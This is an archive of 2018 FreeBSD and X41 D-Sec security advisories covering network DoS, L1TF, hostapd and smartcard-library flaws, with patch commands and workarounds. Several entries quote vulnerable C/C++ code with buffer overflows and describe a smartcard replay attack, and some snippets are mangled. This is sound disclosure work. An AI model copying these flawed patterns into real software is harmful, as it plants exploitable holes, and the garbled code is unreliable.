of sensitive information contained in EAPOL-Key messages.

See https://w1.fi/security/2018-1/unauthenticated-eapol-key-decryption.txt
for a detailed description of the bug.

III. Impact

All users of the WPA2 TKIP pairwise cipher are vulnerable to information, for
example, the group key.

IV.  Workaround

Remove TKIP as an allowed pairwise cipher in RSN/WPA2 networks in
wpa_supplicant.conf(5) by changing 'pairwise=CCMP TKIP' to 'pariwise=CCMP'.

This can also be mitigated by removing TKIP as a cipher on the AP.

Systems and users who do not use WPA2 TKIP are not affected.

V.   Solution

Perform one of the following:

1) Upgrade your vulnerable system to a supported FreeBSD stable or
release / security branch (releng) dated after the correction date.

2) To update your vulnerable system via a binary patch:

Systems running a RELEASE version of FreeBSD on the i386 or amd64
platforms can be updated via the freebsd-update(8) utility:

# freebsd-update fetch
# freebsd-update install

3) To update your vulnerable system via a source code patch:

The following patches have been verified to apply to the applicable
FreeBSD release branches.

a) Download the relevant patch from the location below, and verify the
detached PGP signature using your PGP utility.

[FreeBSD 11.x]
# fetch https://security.FreeBSD.org/patches/SA-18:11/hostapd.patch
# fetch https://security.FreeBSD.org/patches/SA-18:11/hostapd.patch.asc
# gpg --verify hostapd.patch.asc

[FreeBSD 10.4]
# fetch https://security.FreeBSD.org/patches/SA-18:11/hostapd-10.patch
# fetch https://security.FreeBSD.org/patches/SA-18:11/hostapd-10.patch.asc
# gpg --verify hostapd-10.patch.asc

b) Apply the patch.  Execute the following commands as root:

# cd /usr/src
# patch < /path/to/patch

c) Recompile the operating system using buildworld and installworld as
described in https://www.FreeBSD.org/handbook/makeworld.html>.

Restart the applicable daemons, or reboot the system.

VI.  Correction details

The following list contains the correction revision numbers for each
affected branch.

Branch/path  Revision
- -
stable/10/r337832
releng/10.4/  r337829
stable/11/r337831
releng/11.1/  r337828
releng/11.2/  r337828
- --

FreeBSD Security Advisory FreeBSD-SA-18:10.ip

2018-08-14 Thread FreeBSD Security Advisories

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA512

=
FreeBSD-SA-18:10.ip Security Advisory
  The FreeBSD Project

Topic:  Resource exhaustion in IP fragment reassembly

Category:   core
Module: inet
Announced:  2018-08-14
Credits:Juha-Matti Tilli  from
Aalto University, Department of Communications and Networking
and Nokia Bell Labs
Affects:All supported versions of FreeBSD.
Corrected:  2018-08-14 18:17:05 UTC (stable/11, 11.1-STABLE)
2018-08-15 02:30:11 UTC (releng/11.2, 11.2-RELEASE-p2)
2018-08-15 02:30:11 UTC (releng/11.1, 11.1-RELEASE-p13)
CVE Name:   CVE-2018-6923

Special note:   Due to source code differences in FreeBSD 10-stable a patch
is not yet available for FreeBSD 10.4.  This will follow at
a later date.

For general information regarding FreeBSD Security Advisories,
including descriptions of the fields above, security branches, and the
following sections, please visit https://security.FreeBSD.org/>.

I.   Background

The Internet Protocol (IP) version 4 (IPv4) allows fragmentation of
packets which are too big to traverse all the links between two end
stations. Any router along the path between two end hosts may fragment
packets which are larger than a link's maximum transmission unit
(MTU). FreeBSD's implementation of some IPv4 protocols (such as the
Transmission Control Protocol [TCP]) perform path MTU discovery to
avoid the need for fragmentation.

IP version 6 (IPv6) retains the concept of packet fragmentation. It
changed the fragmentation operation to require that the originating
end-system perform path MTU discovery and fragment packets which are
too large for any MTU along the path between two end systems.

While all hosts attached to the Internet are required to support
fragmentation and reassembly, many hosts will encounter very few
legitimate fragmented packets due to the operation of path MTU discovery.

II.  Problem Description

A researcher has notified us of a DoS attack applicable to another
operating system. While FreeBSD may not be vulnerable to that exact
attack, we have identified several places where inadequate DoS protection
could allow an attacker to consume system resources.

It is not necessary that the attacker be able to establish two-way
communication to carry out these attacks. These attacks impact both
IPv4 and IPv6 fragment reassembly.

III. Impact

In the worst case, an attacker could send a stream of crafted
fragments with a low packet rate which would consume a substantial
amount of CPU.

Other attack vectors allow an attacker to send a stream of crafted
fragments which could consume a large amount of CPU or all available
mbuf clusters on the system.

These attacks could temporarily render a system unreachable through
network interfaces or temporarily render a system unresponsive. The
effects of the attack should clear within 60 seconds after the attack stops.

IV.  Workaround

Disable fragment reassembly, using these commands:
 % sysctl net.inet.ip.maxfragpackets=0
 % sysctl net.inet6.ip6.maxfrags=0

On systems compiled with VIMAGE, these sysctls will need to be
executed for each VNET.

V.   Solution

Upgrade your vulnerable system to a supported FreeBSD stable or release or
security branch (releng) dated after the correction date, and reboot.

Perform one of the following:

1) Upgrade your vulnerable system to a supported FreeBSD stable or
release / security branch (releng) dated after the correction date.

Afterward, reboot the system.

2) To update your vulnerable system via a binary patch:

Systems running a RELEASE version of FreeBSD on the i386 or amd64
platforms can be updated via the freebsd-update(8) utility:

# freebsd-update fetch
# freebsd-update install
Afterward, reboot the system.

3) To update your vulnerable system via a source code patch:

The following patches have been verified to apply to the applicable
FreeBSD release branches.

a) Download the relevant patch from the location below, and verify the
detached PGP signature using your PGP utility.

[FreeBSD 11.x]
# fetch https://security.FreeBSD.org/patches/SA-18:10/ip.patch
# fetch https://security.FreeBSD.org/patches/SA-18:10/ip.patch.asc
# gpg --verify ip.patch.asc

b) Apply the patch.  Execute the following commands as root:

# cd /usr/src
# patch < /path/to/patch

c) Recompile your kernel as described in
https://www.FreeBSD.org/handbook/kernelconfig.html> and reboot the
system.

VI.  Correction details

The following list contains the correction revision numbers for each
affected branch.

Branch/path  Revision
- -

FreeBSD Security Advisory FreeBSD-SA-18:09.l1tf

2018-08-14 Thread FreeBSD Security Advisories

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA512

=
FreeBSD-SA-18:09.l1tf   Security Advisory
  The FreeBSD Project

Topic:  L1 Terminal Fault (L1TF) Kernel Information Disclosure

Category:   core
Module: Kernel
Announced:  2018-08-14
Affects:All supported versions of FreeBSD.
Corrected:  2018-08-14 17:51:12 UTC (stable/11, 11.1-STABLE)
2018-08-15 02:30:11 UTC (releng/11.2, 11.2-RELEASE-p2)
2018-08-15 02:30:11 UTC (releng/11.1, 11.1-RELEASE-p13)
CVE Name:   CVE-2018-3620, CVE-2018-3646

Special Note:   Speculative execution vulnerability mitigation remains a work
in progress.  This advisory addresses the issue in FreeBSD
11.1 and later.  We expect to update this advisory to include
10.4 at a later time.

For general information regarding FreeBSD Security Advisories,
including descriptions of the fields above, security branches, and the
following sections, please visit https://security.FreeBSD.org/>.

I.   Background

When a program accesses data in memory via a logical address it is translated
to a physical address in RAM by the CPU.  Accessing an unmapped logical
address results in what is known as a terminal fault.

II.  Problem Description

On certain Intel 64-bit x86 systems there is a period of time during terminal
fault handling where the CPU may use speculative execution to try to load
data.  The CPU may speculatively access the level 1 data cache (L1D).  Data
which would otherwise be protected may then be determined by using side
channel methods.

This issue affects bhyve on FreeBSD/amd64 systems.

III. Impact

An attacker executing user code, or kernel code inside of a virtual machine,
may be able to read secret data from the kernel or from another virtual
machine.

IV.  Workaround

No workaround is available.

V.   Solution

Upgrade your vulnerable system to a supported FreeBSD stable or
release / security branch (releng) dated after the correction date,
and reboot.

Perform one of the following:

1) To update your vulnerable system via a binary patch:

Systems running a RELEASE version of FreeBSD on the i386 or amd64
platforms can be updated via the freebsd-update(8) utility:

# freebsd-update fetch
# freebsd-update install
# shutdown -r +30 "Rebooting for security update"

2) To update your vulnerable system via a source code patch:

The following patches have been verified to apply to the applicable
FreeBSD release branches.

a) Download the relevant patch from the location below, and verify the
detached PGP signature using your PGP utility.

[FreeBSD 11.2]
# fetch https://security.FreeBSD.org/patches/SA-18:09/l1tf-11.2.patch
# fetch https://security.FreeBSD.org/patches/SA-18:09/l1tf-11.2.patch.asc
# gpg --verify l1tf-11.2.patch.asc

[FreeBSD 11.1]
# fetch https://security.FreeBSD.org/patches/SA-18:09/l1tf-11.1.patch
# fetch https://security.FreeBSD.org/patches/SA-18:09/l1tf-11.1.patch.asc
# gpg --verify l1tf-11.1.patch.asc

b) Apply the patch.  Execute the following commands as root:

# cd /usr/src
# patch < /path/to/patch

c) Recompile your kernel as described in
https://www.FreeBSD.org/handbook/kernelconfig.html> and reboot the
system.

VI.  Correction details

CVE-2018-3620 (L1 Terminal Fault-OS)
- 
FreeBSD reserves the the memory page at physical address 0, so it will not
contain secret data.  FreeBSD zeros the paging data structures for unmapped
addresses, so that speculatively executed L1 Terminal Faults will access only
the reserved, unused page.

CVE-2018-3646 (L1 Terminal Fault-VMM)
- -
Patched systems flush the L1 data cache prior to guest entry, so that there
is no secret data in cache for a terminal fault (from the the guest) to
access.

The following list contains the correction revision numbers for each
affected branch.

Branch/path  Revision
- -
stable/11/r337794
releng/11.1/  r337828
releng/11.2/  r337828
- -

To see which files were modified by a particular revision, run the
following command, replacing NN with the revision number, on a
machine with Subversion installed:

# svn diff -cNN --summarize svn://svn.freebsd.org/base

Or visit the following URL, replacing NN with the revision number:

https://svnweb.freebsd.org/base?view=revision=NN>

VII. References

More information on L1 Terminal Fault is available at:

https://cve.mitre.o

FreeBSD Security Advisory FreeBSD-SA-18:08.tcp

2018-08-14 Thread FreeBSD Security Advisories

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA512

=
FreeBSD-SA-18:08.tcpSecurity Advisory
  The FreeBSD Project

Topic:  Resource exhaustion in TCP reassembly 

Category:   core
Module: inet
Announced:  2018-08-06
Credits:Juha-Matti Tilli  from
Aalto University, Department of Communications and Networking
and Nokia Bell Labs
Affects:All supported versions of FreeBSD.
Corrected:  2018-08-06 18:46:09 UTC (stable/11, 11.1-STABLE)
2018-08-15 02:30:11 UTC (releng/11.2, 11.2-RELEASE-p2)
2018-08-15 02:30:11 UTC (releng/11.1, 11.1-RELEASE-p13)
2018-08-06 18:47:03 UTC (stable/10, 10.4-STABLE)
2018-08-15 02:31:10 UTC (releng/10.4, 10.4-RELEASE-p11)
CVE Name:   CVE-2018-6922

For general information regarding FreeBSD Security Advisories,
including descriptions of the fields above, security branches, and the
following sections, please visit https://security.FreeBSD.org/>.


0.   Revision history

v1.0   2018-08-06  Initial release.
v1.1   2018-08-14  Fixed documentation date in manual pages.

I.   Background

The Transmission Control Protocol (TCP) of the TCP/IP protocol suite
provides a connection-oriented, reliable, sequence-preserving data
stream service.

To transmit a stream of data, TCP breaks the data stream into segments
for transmission through the Internet, and reassembles the segments at
the receiving side to recreate the data stream.

II.  Problem Description

One of the data structures that holds TCP segments uses an inefficient
algorithm to reassemble the data. This causes the CPU time spent on
segment processing to grow linearly with the number of segments in the
reassembly queue.

III. Impact

An attacker who has the ability to send TCP traffic to a victim system
can degrade the victim system's network performance and/or consume
excessive CPU by exploiting the inefficiency of TCP reassembly
handling, with relatively small bandwidth cost.

IV.  Workaround

As a workaround, system administrators should configure their systems
to only accept TCP connections from trusted end-stations, if it is
possible to do so.

For systems which must accept TCP connections from untrusted
end-stations, the workaround is to limit the size of each reassembly
queue. The capability to do that is added by the patches noted in the
"Solution" section below.

V.   Solution

As a temporary solution to this problem, these patches limit the size
of each TCP connection's reassembly queue. The value is controlled by
a sysctl (net.inet.tcp.reass.maxqueuelen), which sets the maximum
number of TCP segments that can be outstanding on a session's
reassembly queue. This value defaults to 100.

Note that setting this value too low could impact the throughput of
TCP connections which experience significant loss or
reordering. However, the higher this number is set, the more resources
can be consumed on TCP reassembly processing.

Perform one of the following:

1) Upgrade your vulnerable system to a supported FreeBSD stable or
release / security branch (releng) dated after the correction date.

Afterward, reboot the system.

2) To update your vulnerable system via a binary patch:

Systems running a RELEASE version of FreeBSD on the i386 or amd64
platforms can be updated via the freebsd-update(8) utility:

# freebsd-update fetch
# freebsd-update install

Afterward, reboot the system.

3) To update your vulnerable system via a source code patch:

The following patches have been verified to apply to the applicable
FreeBSD release branches.

a) Download the relevant patch from the location below, and verify the
detached PGP signature using your PGP utility.

[FreeBSD 10.4]
# fetch https://security.FreeBSD.org/patches/SA-18:08/tcp-10.patch
# fetch https://security.FreeBSD.org/patches/SA-18:08/tcp-10.patch.asc
# gpg --verify tcp-10.patch.asc

[FreeBSD 11.x]
# fetch https://security.FreeBSD.org/patches/SA-18:08/tcp-11.patch
# fetch https://security.FreeBSD.org/patches/SA-18:08/tcp-11.patch.asc
# gpg --verify tcp-11.patch.asc

[*** v1.1 NOTE ***] Patchsets are provided for completeness, it have
little impact to runtime behavior.

[FreeBSD 10.4]
# fetch https://security.FreeBSD.org/patches/SA-18:08/tcp-man-10.patch
# fetch https://security.FreeBSD.org/patches/SA-18:08/tcp-man-10.patch.asc
# gpg --verify tcp-man-10.patch.asc

[FreeBSD 11.x]
# fetch https://security.FreeBSD.org/patches/SA-18:08/tcp-man-11.patch
# fetch https://security.FreeBSD.org/patches/SA-18:08/tcp-man-11.patch.asc
# gpg --verify tcp-man-11.patch.asc

b) Apply the patch.  Execute the following commands as root:

# cd /usr/src
# patch < /path/to/patch

c) Recompile your kernel as described in
https://www.FreeBSD.org/handbook/kernelconfig.html> and reb

X41 D-Sec GmbH Security Advisory X41-2018-004: Multiple Vulnerabilities in Yubico libykneomgr

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA256

X41 D-Sec GmbH Security Advisory: X41-2018-004

Multiple Vulnerabilities in Yubico libykneomgr
==


Overview
- 
Confirmed Affected Versions: 0.1.9
Confirmed Patched Versions: -
Vendor: Yubico / Depreciated
Vendor URL: https://www.yubico.com/
Credit: X41 D-Sec GmbH, Eric Sesterhenn
Status: Public
Advisory-URL:
https://www.x41-dsec.de/lab/advisories/x41-2018-004-libykneomgr/


Summary and Impact
- --
An out of bounds write and read was discovered when malicious
responses from a smartcard are received. These might lead to memory
corruptions. We assume that these are not easily exploitable.
X41 did not perform a full test or audit on the software.
Please note that the library is deprecated for more than a year and no
update
will be published by the vendor.


Product Description
- ---
This is a C library to interact with the CCID-part of the YubiKey NEO.
There is a command line tool "ykneomgr" for interactive use.  It
supports querying the YubiKey NEO for firmware version, operation mode
(OTP/CCID) and serial number.  You may also mode switch the device and
manage applets (list, delete and install).

Out of Bounds Read/Writes
=
Severity Rating: Medium
Vector: APDU Response
CVE:
CWE: 120
CVSS Score: 7.1 (High)
CVSS Vector: CVSS:3.0/AV:P/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H


Summary and Impact
- --
File lib/backendpcsc.c contains the following code in function
`backendappletlist()`

{% highlight c %}
 {
   sizet i;
   sizet thislen = recv[length++];
   for (i = 0; i < thislen; i++)
{
  if (appletstr)
{
 if (reallen + 2 > *len)
{
  return YKNEOMGRBACKENDERROR;
}
  sprintf (p, "%02x", recv[length]);
  p += 2;
}
  reallen += 2;
  length++;
}
  if (appletstr)
{
  if (reallen + 1 > *len)
{
  return YKNEOMGRBACKENDERROR;
}
  *p = '\0';
  p++;
}
  reallen++;
  length += 2;
}
{% endhighlight %}

There is an off-by-one write of a '\x00' when the sprintf() is called,
since it terminates the string with a trailing null-byte. Additionally
reads are performed based on thislen, which is retrieved from the data
without further safety checks.


Workarounds
- ---
It is advised to migrate to YubiKey Manager since the vendor does not
support the library anymore and will not issue a patch.

Timeline

2018-02-03 Issues found
2018-05-22 Vendor contacted
2018-05-22 Vendor reply
2018-06-05 Requesting technical feedback from the vendor
2018-06-06 Vendor confirms bug, but states that library is
depreciated, will not be fixed
2018-08-11 Advisory released
- -- 
X41 D-SEC GmbH, Dennewartstr. 25-27, D-52068 Aachen
T: +49 241 9809418-0, Fax: -9
Unternehmenssitz: Aachen, Amtsgericht Aachen: HRB19989
Geschäftsführer: Markus Vervier
-BEGIN PGP SIGNATURE-

iQIzBAEBCAAdFiEEpwxVTgxAIcUvTugIo5Klpg50CxAFAlty3PMACgkQo5Klpg50
CxCvvA//RdQkadlV9yD1IFM7+lqkfMYCyeRyjEg19NWY7QL3Y6C0BeMNiMv/q74i
TUw3G30X6ehgsaef5VWzpC7IibUC2DbltIZV3tYpNHePvc4GeMAl9dytqAy4MGnM
EIxC7RrT4w85EDnaK9NvEXdo2QOlSuzt1MtePYhmoa23wZFH328w1WVhxgAYffna
Cu7LCJIgWkh1y5jqc66553g34SRH3jiuVYSwTgIzC2MhVnXrjktbIwgddJLkV5Zr
eRktqby13iWZns/oGE4GYjsmryoXaoDfGS5wuro7CNua+JqiEPwsH0bURvJDUxGi
MvEEMl5TwoCeTzDqsofLBou1RNLVyI6W19MnYhNC6RCSUuFRXFF3nHqO7vQ5Gpft
JS6URDUKWd/reh0Xwy3dlaEaXEIUPEHBcLwd0wmKqVgMTjUrOvgIAED8woS+Rzn9
qI+NbooNGt1OzlXR4RojKjRMJtWcwya8bhlNLk/ZFl/pokAEh6bZ1jcMg/U0NG9Q
R4AI2u2NX3lE39ku/dcTQQCJpTTcr0DdGUw6kux0dkJXEhEc6YixgFzrHH1CPS/y
2sYLICX3iWjAtd81CO0PL4QXte2ekh8YWaf/1qV2BusOxwlHQjODO8o3kLueU2DC
Uy4ftml35nu+qVS+vYA85N4+4/Fri6UkbjkgbI2fODgE3pImc+A=
=dyfA
-END PGP SIGNATURE-

X41 D-Sec GmbH Security Advisory X41-2018-005: Multiple Vulnerabilities in Apple smartcardservices

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA256

X41 D-Sec GmbH Security Advisory: X41-2018-005

Multiple Vulnerabilities in Apple smartcardservices
===


Overview
- 
Confirmed Affected Versions: e3eb96a6eff9d02497a51b3c155a10fa5989021f
Confirmed Patched Versions: 8eef01a5e218ae78cc358de32213b50a601662de
Vendor: Apple
Vendor URL: https://smartcardservices.github.io/
Credit: X41 D-Sec GmbH, Eric Sesterhenn
Status: Public
Advisory-URL:
https://www.x41-dsec.de/lab/advisories/x41-2018-005-smartcardservices/


Summary and Impact
- --
Attackers with local access can exploit security issues in the
smartcard driver. These result in memory corruptions, which might lead
to code execution. Since smartcards can be used for authentication,
the vulnerabilities may allow an attacker to login to the system
without valid credentials as any user.
X41 did not perform a full test or audit on the software.


Product Description
- ---
The Smart Card Services project is comprised of several components
which, when combined, provide the necessary abstraction layer and
integration of smart cards into Apple’s CDSA implementation.

Stack based buffer overflow
===
Severity Rating: Medium
Vector: APDU Response
CVE: CVE-2018-4300
CWE: 120
CVSS Score: 7.1 (High)
CVSS Vector: CVSS:3.0/AV:P/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H


Summary and Impact
- --
In file Tokend/CAC/CACRecord.cpp the function
CACCertificateRecord::getDataAttribute() might overwrite the value
certificate and possibly other stack data, if a smartcard provides
malicious data.

{% highlight c++ %}
unsigned char command[] = { 0x80, 0x36, 0x00, 0x00, 0x64 };
unsigned char result[MAXBUFFERSIZE];
sizet resultLength = sizeof(result);
uint8 certificate[CACMAXSIZECERT];
uint8 uncompressed[CACMAXSIZECERT];
sizet certificateLength = 0;
try
{
PCSC::Transaction (cacToken);
cacToken.select(mApplication);
uint32t cacreturn;
do
{
cacreturn = cacToken.exchangeAPDU(command,
sizeof(command), result,
resultLength);
if ((cacreturn & 0xFF00) != 0x6300)
CACError::check(cacreturn);
sizet requested = command[4];
if (resultLength != requested + 2)
PCSC::Error::throwMe(SCARDEPROTOMISMATCH);
memcpy(certificate + certificateLength,
result, resultLength - 2);
certificateLength += resultLength - 2;
// Number of bytes to fetch next time around
is in the last byte
// returned.
command[4] = cacreturn & 0xFF;
} while ((cacreturn & 0xFF00) == 0x6300);
}
catch (...)
{
return NULL;
}
{% endhighlight %}

As long as the smartcard returns a return code of 0x63FF, more data is
copied into the certificate buffer, causing a stack based overflow. A
malicious smartcard is able to control all of the overflowed bytes.


Workarounds
- ---
None

Stack based buffer overflow with limited input
==
Severity Rating: Medium
Vector: APDU Response
CVE: CVE-2018-4301
CWE: 120
CVSS Score: 7.1 (High)
CVSS Vector: CVSS:3.0/AV:P/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H


Summary and Impact
- --
In file Tokend/PKCS11/GemaltoKeyHandle.cpp the function
GemaltoPrivateKeyRecord::computeDecrypt() might overwrite the value
strData if the supplied dataLength is too big.

{% highlight c++ %}
void GemaltoPrivateKeyRecord::computeDecrypt(GemaltoToken
, CKULONG mech, const AccessCredentials *cred, unsigned
char *data, sizet dataLength, unsigned char output, size_t )
{
GemaltoToken::log("\nGemaltoPrivateKeyRecord::computeDecrypt
\n");
GemaltoToken::log("GemaltoPrivateKeyRecord::computeDecrypt -
mechanism <%lu>\n", mech);
GemaltoToken::log("GemaltoPrivateKeyRecord::computeDecrypt -
cred <%p>\n", cred);
char strData[6000];
memset(strData, '\0', sizeof(strData));
char str = strData;
for (size_t i=0; i - data <%s>\n", dataLength, strData);
GemaltoToken::log("GemaltoPrivateKeyRecord::computeDecrypt -
output <%p>\n", output);
GemaltoToken::log("GemaltoPrivateKeyRecord::computeDecrypt -
outputLength <%lu>\n", outputLength);
{% endhighlight %}

The attacker might control the data which is to be decrypted, but
exploitation is limited by the sprintf() format string.


Workarounds
- ---
None

Timeline

2018-02-03 Issues found
2018-05-22 Vendor contacted
2018-05-22 Automated vendor reply
2018-05-23

X41 D-Sec GmbH Security Advisory X41-2018-003: Multiple Vulnerabilities in pam_pkcs11

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA256

X41 D-Sec GmbH Security Advisory: X41-2018-003

Multiple Vulnerabilities in pam_pkcs11
==


Overview
- 
Confirmed Affected Versions: 0.6.9
Confirmed Patched Versions: -
Vendor: Unmaintained
Vendor URL: https://github.com/OpenSC/pampkcs11
Credit: X41 D-Sec GmbH, Eric Sesterhenn
Status: Public
Advisory-URL:
https://www.x41-dsec.de/lab/advisories/x41-2018-003-pampkcs11/


Summary and Impact
- --
It is possible to replay an authentication by using a specially
prepared smartcard or token in case pam-pkcs11 is compiled with NSS
support. Furthermore two minor implementation issues have been identified.
X41 did not perform a full test or audit on the software.


Product Description
- ---
This Linux-PAM login module allows a X.509 certificate based user
login. The certificate and its dedicated private key are thereby
accessed by means of an appropriate PKCS #11 module. For the
verification of the users' certificates, locally stored CA
certificates as well as either online or locally accessible CRLs are
used.

Authentication Replay
=
Severity Rating: High
Vector: Login attempt at compromised machine
CVE: -
CWE: 125
CVSS Score: 7.0 (High)
CVSS Vector: CVSS:3.0/AV:P/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N


Summary and Impact
- --
A replay attack is possible due to a logic bug in file pampkcs11.c. In
function `pamsmauthenticate()a nonce is generated and signed with the
card to verify that the card holds the matching secret key, if a valid
certifiate is found. This is done using the functiongetrandomvalue(),
which in turn callsPK11GenerateRandom()`, which queries the smartcard
for random data.
This allows for a replay attack with a malicious smartcard. If a user
plugins in his card into a compromised computer, the nonce and answer
can be recorded by an attacker. The attacker then modifies a smartcard
or a smartcard emulator to replay with the exact same nonce and signed
data, which allows the attacker to login to another computer without
having further access to the smartcard.


Workarounds
- ---
Switch to pam_p11.

Buffer Overflow
===
Severity Rating: Low
Vector: Overly long user home directory
CVE: -
CWE: 121
CVSS Score: -
CVSS Vector: -


Summary and Impact
- --
In file opensshmapper.c a stack based buffer overflow is possible if a
user has a home directory with a length of more than 512 bytes. This
allows to overwrite the passwd structure and possibly the return
address in `opensshmappermatchuser()`;

{% highlight c %}
opensshmapper.c
static int opensshmappermatchuser(X509 *x509, const char *user, void
*context) {
struct passwd *pw;
char filename[512];
if (!x509) return -1;
if (!user) return -1;
pw = getpwnam(user);
if (!pw || isemptystr(pw->pwdir) ) {
DBG1("User '%s' has no home directory",user);
return -1;
}
sprintf(filename,"%s/.ssh/authorizedkeys",pw->pwdir);
return opensshmappermatchkeys(x509,filename);
}
{% endhighlight %}


Workarounds
- ---
Switch to pam_p11.

Memory not cleaned properly before free()
=
Severity Rating: Low
Vector: -
CVE: -
CWE: 244
CVSS Score: -
CVSS Vector: -
_

Summary and Impact
- --
In several places memory is set to zero using memset() and passed on
to free() afterwards. This is a pattern which modern compilers
optimize away, which renders the call to memset() useless. This causes
sensitive data such as passwords to remain in the memory, which
defeats the original intention of the code.

{% highlight c %}
   memset(password, 0, strlen(password));
   free(password);
{% endhighlight %}


Workarounds
- ---
Switch to pam_p11.

Timeline

2018-02-03 Issues found
2018-04-18 Vendor contacted
2018-04-18 Vendor reply
2018-05-18 Technical details provided
2018-05-24 Private git branch created, issues fixed
2018-08-08 Patched version released at
https://github.com/x41sec/pam_pkcs11
2018-08-11 Advisory released
- -- 
X41 D-SEC GmbH, Dennewartstr. 25-27, D-52068 Aachen
T: +49 241 9809418-0, Fax: -9
Unternehmenssitz: Aachen, Amtsgericht Aachen: HRB19989
Geschäftsführer: Markus Vervier
-BEGIN PGP SIGNATURE-

iQIzBAEBCAAdFiEEpwxVTgxAIcUvTugIo5Klpg50CxAFAlty3K4ACgkQo5Klpg50
CxDfHhAAiANUMfz5YSGvQS8HJYcAwiDwL5Z6TRJEKg4RRS94hehzpDCHaVaABsnB
6BtRCx6Jp8hDs9Iz36y+E8txg349OSUyrRSL9RQ6/G7MrLOJ0kOxijkAWbvJg/nD
elgsGa65DKWwqHvc5AsRXxWZFtyNs6CTWGyfJJvyC3cpHM0E0jru5xjuwklm1YAG
DOcqadZav2FPzKJz5tYsDa42aAWYyjE2MMXzkY7kT3aQ2G70DhN2mJqnnmsmMFcH
GZaZO+4SaWq97SNVzzvKXk9m0T8S2HmumAF8g9mGLuCTfBVsbi4DmGyb9mvZOK2S
djwBCHf0rRqXP83hszwHD/zQoW796r7tj9PGmKmvRoDeX76aGuLgQoZ55zged9R1
QkPiD89w+7YANMHumsfLXgXRdhxWaObFvtJWtFCd+v0iS5r249zYukJXn89lnY4p
1x3eBPOzYfSvdHBV0d8/l8uiqZGM9mN55Y4AvkOQYc2EZf78Hb7m150

X41 D-Sec GmbH Security Advisory X41-2018-002: Multiple Vulnerabilities in OpenSC

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA256

X41 D-Sec GmbH Security Advisory: X41-2018-002

Multiple Vulnerabilities in OpenSC
==


Overview
- 
Confirmed Affected Versions: 0.18.0
Confirmed Patched Versions: possibly 0.19.0
Vendor: OpenSC
Vendor URL: https://github.com/OpenSC/OpenSC
Credit: X41 D-Sec GmbH, Eric Sesterhenn
Status: Public
Advisory-URL: https://www.x41-dsec.de/lab/advisories/x41-2018-002-OpenSC/


Summary and Impact
- --
Multiple issues have been identified in OpenSC, ranging from stack
based buffer overflows to out of bounds reads and writes on the heap.
They can be triggered by malicious smartcards sending malformed
responses to APDU commands. Additionally to those fixes reported here,
a lot of minor issues (eg. OOB reads and similar) have been reported
and fixed. The OpenSC team (especially Frank Morgner) did an excellent
job on identifying and fixing further issues.
Due to the large amount of issues, no individual issues have been
rated with CVSS / CVE ID yet.
X41 did not perform a full test or audit on the software, but tried to
help identifying as many bugs as possible in over the course of a year.


Product Description
- ---
OpenSC provides a set of libraries and utilities to work with smart
cards. Its main focus is on cards that support cryptographic
operations, and facilitate their use in security applications such as
authentication, mail encryption and digital signatures.

OOB Write in musclelistfiles()
==
In function muscle_list_files() in file src/libopensc/card-muscle.c an
out of bounds write might occur, since bufLen is not checked.

{% highlight c %}
static int musclelistfiles(sccardt card, u8 *buf, sizet bufLen)
{
muscleprivate_t priv = MUSCLEDATA(card);
mscfst fs = priv->fs;
int x;
int count = 0;
mscfscheckcache(priv->fs);
for(x = 0; x < fs->cache.size; x++) {
u8 oid= fs->cache.array[x].objectId.id;
scdebug(card->ctx, SCLOGDEBUGNORMAL,
"FILE: %02X%02X%02X%02X\n",
oid[0],oid[1],oid[2],oid[3]);
if(0 == memcmp(fs->currentPath, oid, 2)) {
buf[0] = oid[2];
buf[1] = oid[3];
if(buf[0] == 0x00 && buf[1] == 0x00) continue;
/* No directories/null names outside of root */
buf += 2;
count+=2;
}
}
return count;
}
{% endhighlight %}


OOB Write in tcosselectfile()
=
In function tcos_select_file) in file src/libopensc/card-tcos.c a
filename is extracted from an APDU response and written into the
internal file->name variable.

{% highlight c %}
case 0x84:
memcpy(file->name, d, len);
file->namelen = len;
break;
{% endhighlight %}

No check is performed whether the string retrieved from the card fits
into the buffer, which could trigger an OOB write.

OOB Write in pivvalidategeneral_authentication()

In case piv_validate_general_authentication()in
src/libopensc/card-piv.c is called with a datalen parameter greater
than 4096, an out of bound write occurs. Currently no caller seems to
do this.

OOB Write in gemsafegetcert_len()
=
The function gemsafe_get_cert_len() in file
src/libopensc/pkcs15-gemsafeV1.c might write beyond the gemsafe_prkeys
and gemsafe_cert arrays in case more than 12 containers are stored on
the card.

{% highlight c %}
ind = 2; /* skip length */
while (ibuf[ind] == 0x01) {
if (ibuf[ind+1] == 0xFE) {
gemsafeprkeys[i].ref = ibuf[ind+4];
sclog(card->ctx, "Key container %d is
allocated and uses keyref %d",
i+1, gemsafeprkeys[i].ref);
ind += 9;
}
else {
gemsafeprkeys[i].label = NULL;
gemsafecert[i].label = NULL;
sc_log(card->ctx, "Key container %d is
unallocated", i+1);
ind += 8;
}
i++;
}
{% endhighlight %}


OOB Write in utilaclto_str()

In function util_acl_to_str() in file src/tools/util.c no checks are
performed whether the string put together fits into line, which could
be abused to trigger limited out of bounds writes.

OOB Write in readpublickey() and readprivatekey()
=
In function read_public_key() in file src/tools/cryptoflex-tool.c the
bufsize variable is overwritten with file->size retrieved from the
smartcar

X41 D-Sec GmbH Security Advisory X41-2018-001: Multiple Vulnerabilities in Yubico Piv